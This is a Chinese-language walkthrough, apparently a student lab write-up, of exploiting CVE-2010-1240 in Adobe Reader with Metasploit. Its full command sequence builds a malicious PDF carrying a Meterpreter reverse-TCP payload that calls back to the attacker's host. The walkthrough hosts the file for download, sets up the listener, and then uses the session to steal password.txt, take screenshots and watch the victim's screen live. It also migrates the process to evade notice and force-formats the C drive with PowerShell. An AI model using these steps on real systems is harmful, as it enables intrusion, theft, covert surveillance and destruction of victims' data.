这个演示视频展示了如何通过向目标发送一份看起来无害的PDF文件来控制受害者的设备,该文件中实际上嵌入了恶意载荷。该漏洞已被公开为CVE-2010-1240。
由 Bawang Ranger 呈献
本演示视频展示了我们如何通过向目标发送看似无害的PDF文件(实际上嵌入了有效载荷)来控制受害者的设备。该漏洞以CVE-2010-1240公开。
当受害者在Adobe Reader中打开PDF文件时,被我们欺骗并同意安全弹窗的用户将让我们获得一个通过反向TCP连接到其设备的Meterpreter会话。届时,他们所有的数据及当前操作都将处于我们的监控之下。

首先,我们启动MSFconsole,它为我们提供了访问Metasploit框架的命令行界面。
msfconsole
然后,搜索符合目标Windows平台和Adobe PDF Reader的漏洞利用模块,它将显示一整个可用于劫持受害者Windows机器并利用Adobe PDF Reader漏洞的漏洞利用列表。
search type:exploit platform:windows adobe pdf
在这次利用中,我们通过以下命令选择并使用“adobe_pdf_embedded_exe”模块来实现劫持目标。
use exploit/windows/fileformat/adobe_pdf_embedded_exe
我们还可以使用“info”命令来检查漏洞利用的信息,如下所示:
info
然后,我们设置使用反向TCP连接的有效载荷。我们还使用Meterpreter,它提供了一个交互式shell,方便我们通过插入和执行代码来探索受害者的机器,使用各种功能。
set payload windows/meterpreter/reverse_tcp
接着,我们将设置监听主机和端口。对于LHOST,我们需要输入攻击者机器的IP地址,本例中为我们的Kali机器的IP地址(10.0.2.4)*。
*附注:
同时,对于LPORT,我们可以设置一个不常用的端口号。
# 查看Kali机器的IP地址
ifconfig
set LHOST *10.0.2.4*
set LPORT 5665
然后,我们将使用INFILENAME*标志设置PDF的基础输入文件。接下来,我们将文件名设置为能吸引受害者兴趣打开恶意PDF文件的内容。
*附注:
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
我们可以在输入“exploit”命令生成带有PDF的有效载荷之前再次查看我们的选项。
# 然后我们可以显示信息或选项
show info | show options
exploit
一旦我们生成PDF文件,我们会将其移动到/var/www/html目录,这是我们Kali机器托管Web应用服务器的目录,以便受害者稍后下载PDF文件。
注意:
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
然后,为了设置我们的监听器,我们将使用“exploit/multi/handler”。同样,我们将设置有效载荷、LHOST、LPORT与我们生成恶意PDF文件时定义的一致。然后运行有效载荷。
注意:
show info 或 show options 是可选的命令执行。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
在另一个终端中,我们检查Apache服务器的状态以确保它正在运行,以便在/var/www/html中托管我们的PDF文件供受害者下载。
service apache2 status
# 如果未激活,则启动服务
service apache2 start
在Windows机器上,打开任何浏览器(如Chrome),输入我们的Kali IP(10.0.2.4)* 以访问Kali机器的Web应用服务器。
*注意: 请使用你自己的Kali机器的IP地址
然后,模拟用户保存目标PDF文件。
一旦受害者在Adobe Reader 8.1.2中打开文件并接受安全提示消息,我们就可以在我们的Kali机器上观察到有一个新的会话通过反向TCP连接。
在真实场景中, 我们会搭建一个包含嵌入有效载荷PDF的网站,让受害者下载,或者通过电子邮件附件发送文件。
然后,我们可以远程访问受害者的机器,并在Meterpreter会话中进一步执行更多我们想要的恶意行为。
help
pwd
ls
例如,有一个名为password.txt的文件,我们可以执行download password.txt命令
download [文件夹名 | 文件名及扩展名]
当然,如果我们真的邪恶,我们可以编写恶意脚本(植入后门)以保持我们与Windows机器的连接!💀
# 在后台启动命令提示符
execute -f cmd.exe -H -i
# 在Windows上创建文件
echo "你已被黑客攻击" > hack.txt
# 打开我们刚刚创建的txt文件
hack.txt
# 截屏
screenshot
# 实时观看远程用户
screenshare
然而,攻击者可以通过在Meterpreter会话中使用migrate模块将Meterpreter进程迁移到另一个进程来减少怀疑。
meterpreter> run post/windows/manage/migrate
在这里,它将自动在受害者的机器上生成一个新进程,并将自身迁移过去。受害者将能够删除受感染的PDF文件,而完全不知道进程已经转移到其他地方。
攻击者可以进一步在目标机器上使用命令提示符(cmd)或PowerShell创建恶意脚本,这些脚本能够使整个操作系统无法正常运行。
meterpreter> shell
# 启动Windows PowerShell
powershell
# PowerShell命令,强制格式化C盘。
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false